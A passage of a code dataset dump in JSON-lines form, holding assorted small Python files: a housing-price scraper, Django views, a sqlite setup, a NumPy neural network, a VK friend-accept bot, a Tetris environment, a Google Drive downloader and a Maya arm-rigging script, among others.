getRegionsInfo(region):\n    result = []\n    for i in range(regions[region]):\n        r = getPage(region, i + 1)\n        result.extend(r)\n        print(region, r)\n    # write_excel(region, result)\n    return result\n\n\ndef write_excel(region, result):\n    path = 'a.xlsx'\n    if not os.path.exists(path):\n        wb = Workbook()\n        wb.save(path)\n    wb = load_workbook(path)\n    wb.guess_types = True  # guess value types\n    mySheet = wb.create_sheet(title=region)\n    for r in result:\n        mySheet.append(r)\n    wb.save(path)\n\n\n# for r in regions:\n#     getRegionsInfo(r)\n\ndef read_excel():\n    path = 'a.xlsx'\n    if not os.path.exists(path):\n        return\n    wb = load_workbook(path)\n    wb.guess_types = True  # guess value types\n    return wb\n\n\ndef calculation_avg(wb):\n    avg_price = {}\n    avg_area = {}\n    for reg in regions:\n        mySheet = wb[reg]\n        price = [int(r.value.replace('单价', '').replace('元/平米', '')) for r in mySheet['D']]\n        area = [float(r.value.split('|')[1].replace('平米', '')) for r in mySheet['B']]\n        avg_price[reg] = sum(price) / len(price)\n        avg_area[reg] = sum(area) / len(area)\n    return avg_price, avg_area\n\n\nprice_list, area_list = calculation_avg(read_excel())\n\ndf1 = pd.DataFrame(price_list.values(), columns=['avg_price'], index=list(price_list.keys()))\ndf2 = pd.DataFrame(area_list.values(), columns=['avg_area'], 
index=list(area_list.keys()))\ndf1.plot.bar()\ndf2.plot.bar()\nplt.show()\n","repo_name":"Crack-DanShiFu/pachong8","sub_path":"lianjia3.py","file_name":"lianjia3.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27347733651","text":"#!/usr/bin/python3\n\nif __name__ == \"__main__\":\n\n from sys import argv\n\n arg = \"argument\"\n length = len(argv)\n summ = 0\n\n for args in range(length):\n if args > 0:\n summ += int(argv[args])\n\n print(\"{}\".format(summ))\n","repo_name":"josephmaxime/alx-higher_level_programming","sub_path":"0x02-python-import_modules/3-infinite_add.py","file_name":"3-infinite_add.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71048758011","text":"from django.shortcuts import render\n\nfrom main.models import Task, Todo\n\n\ndef todo_tasks(request, pk):\n try:\n todo = Todo.objects.get(id=pk)\n tasks = Task.objects.filter(todo=todo, completed=False)\n # date - en_formats.DATE_FORMAT = \"d/m/Y\" - in settings.py\n context = {\"todo\": todo, \"tasks\": tasks, \"completed\": False}\n return render(request, 'todo_list.html', context=context)\n except Todo.DoesNotExist:\n return render(request, '404.html')\n\n\ndef completed_tasks(request, pk):\n try:\n todo = Todo.objects.get(id=pk)\n tasks = Task.objects.filter(todo=todo, completed=True)\n context = {\"todo\": todo, \"tasks\": tasks, \"completed\": True}\n return render(request, 'completed_todo_list.html', context=context)\n except Todo.DoesNotExist:\n return render(request, '404.html')\n","repo_name":"ayananygmetova/BFDjango","sub_path":"lab4/TODO/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4382880849","text":"import sqlite3\n\n\nconn = sqlite3.connect(database='sqlitedb.db')\n\nmycursor=conn.cursor()\ntry:\n # execute : sql 구문을 실행하는 함수\n mycursor.execute(\"drop table sungjuk\")\nexcept sqlite3.OperationalError as err:\n print(\"테이블이 존재하지 않습니다.\")\n\nmycursor.execute('''create table sungjuk\n(id text, subject text , jumsu integer, unique(id,subject))\n''')\n\ndatamylist=[('lee','java',10),('lee','html',20),('lee','python',30),('jo','java',40),\n ('jo','html',50),('jo','pytho ',60),('ko','java',70),('ko','html',80),\n ('ko','python',90)]\n\nsql = \"insert into sungjuk(id, subject, jumsu) values(?,?,?)\"\n\nmycursor.executemany(sql, datamylist)\nconn.commit()","repo_name":"Orderlee/SBA_STUDY","sub_path":"0908/03_spliteEx02.py","file_name":"03_spliteEx02.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38631815656","text":"import numpy as np\r\nimport scipy.io as sio\r\nimport matplotlib.pyplot as plt\r\nbodyfat_data = sio.loadmat('C:\\\\Users\\\\Ric\\\\Desktop\\\\545HW3\\\\bodyfat_data.mat')\r\n\r\nmseList=list()\r\nnp.random.seed(0)\r\nx = bodyfat_data['X']\r\ny = bodyfat_data['y']\r\nn,d= x.shape\r\nytrain=y[:150]\r\nXmatrix=np.asmatrix(np.concatenate((np.ones((n,1)),x),axis=1)[0:150,:])\r\n\r\n\r\nite=0\r\nwhile (True):\r\n if ite==0:\r\n###################Forward Pass###########################\r\n z0=Xmatrix\r\n inputNum=150\r\n w1=np.random.randn(64,3)\r\n w1[:,0]=0\r\n a1=z0.dot(w1.T)\r\n a1[a1<=0]=0\r\n 
z1=np.asmatrix(np.concatenate((np.ones((inputNum,1)),a1),axis=1))\r\n w2=np.random.randn(16,65)\r\n w2[:,0]=0\r\n a2=z1.dot(w2.T)\r\n a2[a2<=0]=0\r\n z2=np.asmatrix(np.concatenate((np.ones((inputNum,1)),a2),axis=1))\r\n w3=np.random.randn(1,17)\r\n w3[:,0]=0\r\n a3=z2.dot(w3.T)\r\n \r\n \r\n \r\n else:\r\n \r\n z0=Xmatrix\r\n inputNum=150\r\n \r\n a1=z0.dot(w1.T)\r\n a1[a1<=0]=0\r\n z1=np.asmatrix(np.concatenate((np.ones((inputNum,1)),a1),axis=1))\r\n \r\n \r\n a2=z1.dot(w2.T)\r\n a2[a2<=0]=0\r\n z2=np.asmatrix(np.concatenate((np.ones((inputNum,1)),a2),axis=1))\r\n \r\n a3=z2.dot(w3.T)\r\n########################################################################\r\n\r\n#############Loss Metric################################################ \r\n mse = (np.square(a3-ytrain)).mean(axis=0)\r\n print(mse)\r\n print(ite)\r\n mseList.append(np.asscalar(mse))\r\n######################################################################## \r\n \r\n#####################Backward Pass###################################### \r\n delta3=-2*(ytrain-a3)\r\n sigmaPrime2=a2.copy()\r\n \r\n sigmaPrime2[sigmaPrime2>0]=1\r\n delta2=np.multiply(delta3.dot(w3[:,1:]),sigmaPrime2)\r\n for j in range(16):\r\n for i in range(65):\r\n partial=0\r\n for iteN in range(inputNum):\r\n partial=partial+delta2[iteN,j]*z1[iteN,i]\r\n partial=partial/inputNum\r\n w2[j,i]=w2[j,i]-10**(-7)*partial\r\n \r\n sigmaPrime1=a1.copy()\r\n sigmaPrime1[sigmaPrime1>0]=1\r\n \r\n delta1=np.multiply(delta2.dot(w2[:,1:]),sigmaPrime1)\r\n for j in range(64):\r\n for i in range(3):\r\n partial=0\r\n for iteN in range(inputNum):\r\n partial=partial+delta1[iteN,j]*z0[iteN,i]\r\n partial=partial/inputNum\r\n w1[j,i]=w1[j,i]-10**(-7)*partial\r\n######################################################################## \r\n ite=ite+1\r\n if ite>1:\r\n if (abs(mseList[ite-1]-mseList[ite-2])<10**(-4)):\r\n break\r\n\r\nprint(\"Stopping criterion: the absolute value of the change of MSE < 1e-4\")\r\nprint(\"After \"+str(ite)+\" iterations,\"+\"training data MSE: \"+str(mseList[-1]))\r\nplt.title(\"log of MSE vs iterations\")\r\nplt.plot(np.log(mseList))\r\nplt.ylabel(\"log of MSE\")\r\nplt.show()\r\n\r\n# For test data\r\n################################Forward Pass#################################\r\nytest=y[150:]\r\nXMatrixTest=np.asmatrix(np.concatenate((np.ones((n,1)),x),axis=1)[150:,:])\r\n\r\n\r\nz0=XMatrixTest\r\ninputNum=n-150\r\n\r\n\r\na1=z0.dot(w1.T)\r\na1[a1<=0]=0\r\nz1=np.asmatrix(np.concatenate((np.ones((inputNum,1)),a1),axis=1))\r\n\r\n\r\na2=z1.dot(w2.T)\r\na2[a2<=0]=0\r\nz2=np.asmatrix(np.concatenate((np.ones((inputNum,1)),a2),axis=1))\r\n\r\na3=z2.dot(w3.T)\r\n############################################################################\r\n\r\n#########################Loss Metric#######################################\r\nmse = (np.square(a3-ytest)).mean(axis=0)\r\n############################################################################\r\nprint(\"Test data MSE: \"+str(np.asscalar(mse)))\r\n","repo_name":"RickYuankangShong-Quantitative-Finance/Quantitative-Finance","sub_path":"neuralNetwork.py","file_name":"neuralNetwork.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36125209034","text":"import logging\r\nimport time\r\nimport typing\r\nfrom threading import Thread\r\n\r\nfrom vkapi import VkApi, VkApiResponseException\r\nfrom ... 
import utils\r\nfrom ...objects import dp, MySignalEvent, DB\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\nafa_thread: Thread = None\r\nstop_thread = False\r\n\r\n\r\ndef set_afa(v):\r\n    global stop_thread\r\n    global afa_thread\r\n\r\n    db = DB()\r\n    stop_thread = v\r\n    if v == False:\r\n        api = VkApi(db.access_token)\r\n        afa_thread = Thread(target=afa_th, args=(api, lambda: stop_thread))\r\n        afa_thread.setDaemon(True)\r\n        afa_thread.setName('AFA Thread')\r\n        afa_thread.start()\r\n\r\n\r\ndef afa_th(api: VkApi, stop: typing.Callable):\r\n    is_stop = False\r\n    while True:\r\n        try:\r\n            if is_stop: break\r\n            logger.info(\"Установлен онлайн\")\r\n\r\n            data = api('friends.getRequests', offset=0, count=1000, extended=0, need_mutual=0, out=0, need_viewed=1)[\r\n                'items']\r\n            users = api('users.get', user_ids=\",\".join([str(i) for i in data]))\r\n\r\n            for user in users:\r\n                if user.get('deactivated', None) != None:\r\n                    continue\r\n                try:\r\n                    api(\"friends.add\", user_id=user['id'])\r\n                except VkApiResponseException as e:\r\n                    logger.error(\r\n                        f'Ошибка добавления пользвателя в друзья. {e.error_code} {e.error_msg} {e.request_params}')\r\n                time.sleep(5)\r\n                is_stop = stop()\r\n                if is_stop: break\r\n        except Exception as e:\r\n            logger.info(f\"Ошибка в AFA: {e}\")\r\n            time.sleep(300)\r\n\r\n\r\n@dp.my_signal_event_handle('-адвд', '-друзья')\r\ndef off_afa(event: MySignalEvent):\r\n    global afa_thread\r\n    global stop_thread\r\n\r\n    logger.info(\"Выключено автодобавление в друзья\")\r\n\r\n    if afa_thread == None or not afa_thread.is_alive():\r\n        utils.new_message(event.api, event.chat.peer_id, message=\"❗ Автодобавление в друзья не запущено\")\r\n        return \"ok\"\r\n    set_afa(True)\r\n    utils.new_message(event.api, event.chat.peer_id, message=\"✅ Автодобавление в друзья остановлено.\")\r\n    return \"ok\"\r\n\r\n\r\n@dp.my_signal_event_handle('+адвд', '+друзья')\r\ndef on_afa(event: MySignalEvent):\r\n    global afa_thread\r\n    global stop_thread\r\n\r\n    logger.info(\"Установлен онлайн\")\r\n\r\n    stop_thread = False\r\n    if afa_thread != None and afa_thread.is_alive():\r\n        utils.new_message(event.api, event.chat.peer_id, message=\"✅ Автодобавление в друзья и так запущено.\")\r\n        return \"ok\"\r\n    set_afa(False)\r\n    utils.new_message(event.api, event.chat.peer_id, message=\"✅ Автодобавление в друзья запущено.\")\r\n    return \"ok\"\r\n\r\n\r\n@dp.my_signal_event_handle('адвд', 'друзья')\r\ndef check_afa(event: MySignalEvent):\r\n    global afa_thread\r\n    if afa_thread != None and afa_thread.is_alive():\r\n        utils.new_message(event.api, event.chat.peer_id, message=\"✅ Автодобавление в друзья работает.\")\r\n        return \"ok\"\r\n    else:\r\n        utils.new_message(event.api, event.chat.peer_id, message=\"✅ Автодобавление в друзья не работает.\")\r\n        return \"ok\"\r\n","repo_name":"dutydev/IDM","sub_path":"idm/commands/my_signals/auto_friends_add.py","file_name":"auto_friends_add.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"ru","doc_type":"code","stars":19,"dataset":"github-code","pt":"78"} +{"seq_id":"72675252732","text":"\n# Task 1. 
Files\n# Write a script that creates a new output file called myfile.txt and writes the string \"Hello file world!\" in it.\n# Then write another script that opens myfile.txt, and reads and prints its contents.\n# Run your two scripts from the system command line.\n# Does the new file show up in the directory where you ran your scripts?\n# What if you add a different directory path to the filename passed to open?\n# Note: file write methods do not add newline characters to your strings;\n# add an explicit ‘\\n’ at the end of the string if you want to fully terminate the line in the file.\n\nimport os\nimport shutil\n\nmy_file = open('myfile.txt', 'w+')\nmy_file.write('Hello file world!')\nmy_file.close()\nmy_file = open('myfile.txt')\nprint(my_file.read())\nmy_file.close()\nshutil.move('myfile.txt', 'new_myfile')\n\n\n# Task 2. Extend Phonebook application\n# Functionality of Phonebook application:\n# Add new entries\n# Search by first name\n# Search by last name\n# Search by full name\n# Search by telephone number\n# Search by city or state\n# Delete a record for a given telephone number\n# Update a record for a given telephone number\n# An option to exit the program\n#\n# The first argument to the application should be the name of the phonebook. Application should load JSON data,\n# if it is present in the folder with application, else raise an error.\n# After the user exits, all data should be saved to loaded JSON.\n\nimport json\n\ndef print_contacts(all_contacts):\n    for i in all_contacts:\n        print(i['name'], i['phone'], i['initials'], i['city'], i['country'], sep='\\n')\n\n\ndef creating_contact(new_contacts):\n    new_contact = dict(phone='-', name='-', last_name='-', initials='-', city='-', country='-')\n    new_contact['phone'] = input('Input phone number')\n    new_contact['name'] = input('Input name')\n    new_contact['last_name'] = input('Input last_name')\n    initial_n = new_contact.get('name')\n    initial_ln = new_contact.get('last_name')\n    new_contact['initials'] = initial_n[0] + initial_ln[0]\n    new_contact['city'] = input('Input city')\n    new_contact['country'] = input('Input country')\n    new_contacts.append(new_contact)\n    adding_contact(new_contact)\n    return new_contact\n\ndef adding_contact(add_new_contact):\n    phonebook_file = open('Phonebook.json', 'w+')\n    phonebook_file.write(json.dumps(add_new_contact))\n    phonebook_file.close()\n\ndef searching_contact_name(contacts):\n    found = False\n    name_id = input('Input name:')\n    for contact in contacts:\n        if contact.get('name').upper() == name_id.upper():\n            print(contact.get('phone'), contact.get('name'), contact.get('initials'),\n                  contact.get('city'), contact.get('country'))\n            found = True\n    if not found:\n        print('Required contact was not found')\n\ndef searching_contact_phone(contacts):\n    found = False\n    phone_id = input('Input phone:')\n    for contact in contacts:\n        if contact.get('phone') == phone_id:\n            print(contact.get('phone'), contact.get('name'), contact.get('initials'),\n                  contact.get('city'), contact.get('country'))\n            found = True\n    if not found:\n        print('Required contact was not found')\n\ndef delete_contact(contacts):\n    found = False\n    name_id = input('Input name:')\n    for contact in contacts:\n        if contact.get('name').upper() == name_id.upper():\n            contacts.remove(contact)\n            found = True\n            break\n    if not found:\n        print('Required contact was not found')\n\n\n\n\n\n\n\n","repo_name":"BVBohdan/Homework","sub_path":"lsn10.py","file_name":"lsn10.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} 
+{"seq_id":"8255227440","text":"class tree():\n def __init__(self, root, left = None, right = None):\n self.root = root\n self.left = left\n self.right = right\n\ndef node_value(node):\n return node.root\n\n# reference: http://www.geeksforgeeks.org/diameter-of-a-binary-tree/\ndef height(tree):\n # base case when tree is empty, then height is 0\n if tree == None:\n return 0\n # tree height is max(left sub-tree height, right sub-tree height) plus 1\n h_l = height(tree.left)\n h_r = height(tree.right)\n return max(h_l, h_r) + 1\n\n# diameter (the longest path between two leaf nodes) could be formed by nodes through the root node or not, thus diameter is generated from the larget of the three:\n# 1. if through the root, heigh of left sub-tree + height of right sub-tree + 1\n# 2. if not through the root, left sub-tree diameter or right sub-tree diameter\ndef diameter(tree):\n # Base Case when tree is empty \n if tree == None:\n return 0\n # Get the height of left and right sub-trees\n h_left = height(tree.left)\n h_right = height(tree.right)\n # Get the diameter of left and irgh sub-trees\n d_left = diameter(tree.left)\n d_right = diameter(tree.right)\n # Return max of the following:\n # 1) Diameter of left subtree\n # 2) Diameter of right subtree\n # 3) Height of left subtree + height of right subtree +1\n return max(d_left, d_right, h_left+h_right+1)\n\n# a more condense way to return diameter and height and in one recursive function \ndef longestPath(n):\n # base case when tree is empty, so that diameter, height as 0, 0\n if n == None:\n return 0, 0\n # get the (diameter, height) of left and right sub-tree\n left_longest, l_height = longestPath(n.left)\n right_longest, r_height = longestPath(n.right)\n # diameter is the larget among left sub-tree diameter, right sub-tree diamater, and left sub-tree height+right sub-tree height+1, while height is max(left sub-tree height, right sub-tree height) + 1\n return max(left_longest, right_longest, l_height+r_height + 1), max(l_height, r_height) + 1\n \nsub_tree_l = tree('B', tree('D'))\nsub_tree_r = tree('C', tree('E'), tree('F'))\nT = tree('A', sub_tree_l, sub_tree_r)\n\nprint(longestPath(T))\nprint(diameter(T))\n","repo_name":"smallfishxz/Practice_Algorithm","sub_path":"Tree/Diameter_longest_path.py","file_name":"Diameter_longest_path.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27795704863","text":"import pygame\nimport time\nimport settings as s\nimport arena\nimport random\n\nclass Tetris:\n def __init__(self):\n self.renders = False\n if self.renders:\n pygame.init()\n pygame.display.set_caption(\"tetris\")\n self.screen = pygame.display.set_mode(s.screen_size)\n\n self.main_arena = arena.Arena(s.arena_size, renders=self.renders)\n self.steps = 0\n self.score = 0\n self.merge_delay = 5\n self.merge_counter = 0\n self.episode = 0\n\n\n def sample(self):\n random_value = random.randint(0, 3)\n return random_value\n\n def reset(self):\n self.episode += 1\n self.main_arena = arena.Arena(s.arena_size, self.renders)\n self.steps = 0\n self.score = 0\n self.merge_delay = 5\n self.merge_counter = 0\n return self.main_arena.state()\n\n def select_action(self):\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_UP:\n return 3\n if event.key == pygame.K_RIGHT:\n return 0\n if event.key == pygame.K_LEFT:\n return 1\n if event.key == 
pygame.K_DOWN:\n                        return 2\n\n    def step(self, action):\n        start_score = self.main_arena.score\n\n        self.main_arena.update_moving_blocks()\n        self.main_arena.check_block_merge()\n\n\n        self.steps += 1\n        self.merge_counter += 1\n        if action == 0:\n            self.main_arena.move_block_right()\n        if action == 1:\n            self.main_arena.move_block_left()\n        if action == 3:\n            self.main_arena.rotate_block()\n        if action == 2:\n            self.main_arena.place_block()\n\n        reward = self.main_arena.score - start_score - self.main_arena.bumpyness()//2 - self.main_arena.aggregate_height()//5 + self.steps//2\n\n        if self.renders and self.episode % 10 == 0:\n            self.render()\n\n        return self.main_arena.state(), reward, self.main_arena.running, None\n\n\n\n    def render(self):\n        self.main_arena.render(self.screen)\n        pygame.display.flip()\n\ndef main():\n    pygame.init()\n    pygame.display.set_caption(\"tetris\")\n    screen = pygame.display.set_mode(s.screen_size)\n    running = True\n    step = 0\n    score = 0\n    merge_delay = 20\n    merge_counter = 0\n\n    main_arena = arena.Arena(s.arena_size, renders=True)\n    while running:\n        if step % 10 == 0:\n            if main_arena.update_moving_blocks():\n                merge_counter = 0\n        if merge_counter > merge_delay:\n            main_arena.check_block_merge()\n            merge_counter = 0\n        time.sleep(0.03)\n        main_arena.render(screen)\n        pygame.display.flip()\n        screen.fill((220, 220, 220))\n        for event in pygame.event.get():\n            if event.type == pygame.QUIT:\n                running = False\n            if event.type == pygame.KEYDOWN:\n                if event.key == pygame.K_UP:\n                    main_arena.rotate_block()\n                if event.key == pygame.K_RIGHT:\n                    main_arena.move_block_right()\n                if event.key == pygame.K_LEFT:\n                    main_arena.move_block_left()\n                if event.key == pygame.K_DOWN:\n                    main_arena.place_block()\n                if event.key == pygame.K_0:\n                    pass\n                    # main_arena.add_moving_block()\n        step += 1\n        merge_counter += 1\n        running = main_arena.running\n\nif __name__ == '__main__':\n    main()","repo_name":"Joeydelarago/tetrisneuralnetwork","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17490758578","text":"import smbus\nimport time\n\n# If you're using SDA1+SCL1, set this to 1\n# If you're using SDA0+SCL0, set this to 0\nport = 1\nbus = smbus.SMBus(port)\ndevice_address = 0x5a\n\ntry:\n    # to read the object temperature, pass in 0x07\n    # to read the ambient temperature, pass in 0x06\n    reading = bus.read_word_data(device_address, 0x07)\n    tempc = reading * .02 - 273.15\n    tempf = (tempc * 9.0 / 5.0) + 32.0\n    print(tempf)\nexcept IOError:\n    print(\"error\")","repo_name":"locofocos/wood-stove-rails","sub_path":"lib/read_temp.py","file_name":"read_temp.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21512658352","text":"#!/usr/bin/python\n\nimport tinycss\nimport sys\nimport re\nimport json\n\n\ndef get_end_line(line_number):\n\tcss_file_as_lines = css_file.splitlines()\n\topen_brackets = 0\n\twhile line_number <= len(css_file_as_lines):\n\t\topen_brackets += len(re.findall(\"{\", css_file_as_lines[line_number - 1]))\n\t\topen_brackets -= len(re.findall(\"}\", css_file_as_lines[line_number - 1]))\n\t\tif open_brackets == 0:\n\t\t\treturn line_number\n\t\tif open_brackets < 0:\n\t\t\tprint(\"Parsing Error: In get_end_line()\")\n\t\tline_number += 1\n\n\nparser = tinycss.make_parser('page3')\ncss_file = sys.stdin.read()\nstylesheet = 
parser.parse_stylesheet_bytes(css_file)\n\nfragments = {'fragments': []}\nfor rule in stylesheet.rules:\n\tfragments['fragments'].append(\n\t\t{'name': str(rule.selector.as_css()), 'startLine': rule.line, 'endLine': get_end_line(rule.line),\n\t\t 'fragments': [], 'classifier': 'rule'})\n\tfor declaration in rule.declarations:\n\t\tparent = fragments['fragments'][len(fragments['fragments']) - 1]\n\t\tparent['fragments'].append({'name': declaration.name, 'startLine': declaration.line, 'endLine': declaration.line,\n\t\t 'fragments': [], 'classifier': 'declaration', 'value': str(declaration.value.as_css())})\n\nprint(json.dumps(fragments, indent=2))","repo_name":"101companies/101repo","sub_path":"technologies/CSSFactExtractor/extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"78"} +{"seq_id":"73816731453","text":"from struct import Struct, unpack\nfrom collections import namedtuple\n\n\nclass PEStructs:\n _IMAGE_FILE_HEADER = namedtuple('_IMAGE_FILE_HEADER',\n ('Machine',\n 'NumberOfSections',\n 'TimeDateStamp',\n 'PointerToSymbolTable',\n 'NumberOfSymbols',\n 'SizeOfOptionalHeader',\n 'Characteristics'))\n @classmethod\n def read_image_file_header(cls, file):\n format = Struct(' c1)\r\n\r\nprint(c1.name, c1.age)\r\nprint(c2.name, c2.age)\r\n\r\nif c1.compare(c2): # compare(self = c1, c2)\r\n pass\r\n","repo_name":"danishkhanbx/Everything-in-Python","sub_path":"Constructor & self.py","file_name":"Constructor & self.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"4664919349","text":"# Selenium stuff should go in here too\nfrom pathlib import Path\n\n\n# Class adapted from https://github.com/ndrplz/google-drive-downloader/blob/master/google_drive_downloader/google_drive_downloader.py\nclass GoogleDriveHandler:\n\t\"\"\" Google Drive interface. \"\"\"\n\n\tCHUNK_SIZE = 32768\n\tDOWNLOAD_URL = 'https://docs.google.com/uc?export=download'\n\n\t@classmethod\n\tdef download_file(cls, file_id, dest_path):\n\t\t\"\"\" Download a file from Google Drive. \"\"\"\n\t\ttry:\n\t\t\timport requests\n\t\texcept ImportError as e:\n\t\t\traise ImportError(\n\t\t\t\t\"This function requires the requests library.\"\n\t\t\t\t\"Please install it using `pip install requests`.\"\n\t\t\t) from e\n\n\t\tdest_path = Path(dest_path)\n\t\tdest_path.parent.mkdir(parents=True, exist_ok=True)\n\n\t\tsession = requests.Session()\n\n\t\tprint(f\"Downloading {file_id} into {dest_path} ... 
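`get_end_line` in the CSS extractor above locates a rule's closing line by counting opening and closing braces from the rule's start line. The same idea as a standalone helper over a list of source lines, without the module-level globals:

```python
# Brace counting from the CSS extractor above: given source lines and a
# 1-based start line, find the line on which the block opened there closes.
import re

def block_end_line(lines, start_line):
    depth = 0
    for n in range(start_line, len(lines) + 1):
        depth += len(re.findall(r"{", lines[n - 1]))
        depth -= len(re.findall(r"}", lines[n - 1]))
        if depth == 0:
            return n
    raise ValueError("unbalanced braces")

css = "a {\n  color: red;\n}\nb { font-weight: bold; }".splitlines()
print(block_end_line(css, 1))  # -> 3
print(block_end_line(css, 4))  # -> 4
```

Like the original, this treats a line whose braces balance out as the end of the block, which is sufficient for the one-rule-per-block CSS the extractor targets.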
\", end=\"\", flush=True)\n\n\t\tresponse = session.get(cls.DOWNLOAD_URL, params={'id': file_id}, stream=True)\n\n\t\ttoken = cls._get_confirm_token(response)\n\t\tif token:\n\t\t\tparams = {'id': file_id, 'confirm': token}\n\t\t\tresponse = session.get(cls.DOWNLOAD_URL, params=params, stream=True)\n\n\t\tcls._save_response_content(response, dest_path)\n\t\tprint('Done.')\n\n\t@staticmethod\n\tdef _get_confirm_token(response):\n\t\tfor key, value in response.cookies.items():\n\t\t\tif key.startswith('download_warning'):\n\t\t\t\treturn value\n\t\treturn None\n\n\t@classmethod\n\tdef _save_response_content(cls, response, destination):\n\t\twith open(destination, 'wb') as f:\n\t\t\tfor chunk in response.iter_content(cls.CHUNK_SIZE):\n\t\t\t\tif chunk: # filter out keep-alive new chunks\n\t\t\t\t\tf.write(chunk)\n","repo_name":"MatejVitek/Python-Libraries","sub_path":"matej/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2069042445","text":"import random\nimport string\nfrom core.printer import Printer\nfrom core.actions import Action\nfrom core.question.question import Question\nfrom difflib import SequenceMatcher\n\n\nclass TypeWord(Question):\n def __init__(self, lines, index, num_options, num_shown_lines):\n super().__init__(lines, index)\n self.question_text = 'Type the missing word?'\n self.num_options = num_options\n self.num_shown_lines = num_shown_lines\n self.printer = Printer()\n self.answer = None\n self.options = []\n self.user_answer = None\n self.is_answered = False\n\n @property\n def start_line_index(self):\n return max(self.index - self.num_shown_lines, 0)\n\n @property\n def answered_correctly(self):\n s_answer = self.answer.translate(\n str.maketrans('', '', string.punctuation))\n s_user_answer = self.user_answer.translate(\n str.maketrans('', '', string.punctuation))\n accuracy = self.similar(s_answer.lower(), s_user_answer.lower())\n return accuracy > 0.9\n\n def similar(self, a, b):\n return SequenceMatcher(None, a, b).ratio()\n\n def longest_word(self, words):\n longest = ''\n for word in words:\n if len(word) > len(longest):\n longest = word\n return longest\n\n def average_word_length(self, words):\n return int(len(''.join(words)) / len(words))\n\n def print_question(self):\n for i in range(self.start_line_index, self.index):\n print('\\t' + self.lines[i])\n last_line = self.lines[self.index]\n space = int(self.average_word_length(last_line.split()) * 1.5)\n q_line = last_line.replace(self.answer, '▁' * space)\n print('\\t' + q_line)\n print(f'\\nQ: {self.question_text}', '\\n')\n\n def execute(self):\n '''Creates options from the given text then asks'''\n self.answer = random.choice(self.lines[self.index].split())\n\n def ask(self):\n '''Displays the question and asks for user answer'''\n self.print_question()\n\n action = Action.Invalid\n choice = input('\\nAnswer: ')\n\n if 'q' == choice:\n action = Action.Quit\n self.is_answered = True\n action = Action.Quit\n elif len(choice) > 0:\n self.is_answered = True\n self.user_answer = choice\n action = Action.Continue\n else:\n print('\\nInvalid option, please try again!\\n')\n\n return action\n","repo_name":"Pomb/memorite","sub_path":"lib/core/question/type_word.py","file_name":"type_word.py","file_ext":"py","file_size_in_byte":2500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"34792386665","text":"#-*- coding:utf-8 
-*-\nimport maya.cmds as cmds\nfrom TDModularRiggingSystem.lib import System as System\n\n#Arm rigging [LR : 1=left, 2=right], [CtlColor : controller color]\nclass TDArmRigging():\n    def __init__(self):\n        #self.System.__init__()\n        self.System = System.ModularRiggingSystem()\n        self.ArmNull = []#offset nodes for the arm joints\n        self.armRotateAttr = {}#default rotation values of the arm joints\n\n    \"-----Run the commands-----\"\n    def setArmRigging(self,LR,CtlColor,switchCtlName,ArmAttrList):\n        TDArmRigging.getDefaultRotateAttr(self,LR)\n        #TDArmRigging.createArmNull(self,LR)\n        TDArmRigging.createFKArmJoint(self,LR,CtlColor)\n        TDArmRigging.createIKArmJoint(self,LR,CtlColor)\n        self.IKArmCtlList = TDArmRigging.createIKArmCtl(self,LR,CtlColor)\n        TDArmRigging.createIKForeArmCtl(self,LR,CtlColor)\n        TDArmRigging.createIKShoulderCtl(self,LR,CtlColor)\n        TDArmRigging.createFKArmCtl(self,CtlColor)\n        TDArmRigging.createIKArmExpression(self,LR,switchCtlName)\n        self.ArmGrpList = TDArmRigging.setArmCtlLayering(self)\n        TDArmRigging.setDefaultRotateAttr(self,LR)\n        TDArmRigging.connectArmSwitch(self,LR,ArmAttrList)\n        #TDArmRigging.addArmCtlClass(self,LR)\n\n        return [self.IKArmCtlList, self.ArmGrpList]\n\n    #Store the default rotation values and return the arm joints to the T-pose\n    def getDefaultRotateAttr(self,LR):\n        for armDRA in self.System.getBetweenJoint(self.System.getJointLabelType()[LR,9],self.System.getJointLabelType()[LR,12]):\n            self.armRotateAttr[armDRA] = self.System.getJointRotate()[armDRA]\n            cmds.setAttr(armDRA+\".rotate\",0,0,0)\n\n    #Create offset nodes for the arm joints\n    def createArmNull(self,LR):\n        for armNulls in self.getBetweenJoint(self.getJointLabelType()[LR,9],self.getJointLabelType()[LR,12]):\n            self.armNullGP = self.createGP(armNulls,\"%s_Offset\"%armNulls)\n            self.ArmNull.append(self.armNullGP)\n\n    #Create the FK joints\n    def createFKArmJoint(self,LR,CtlColor):\n        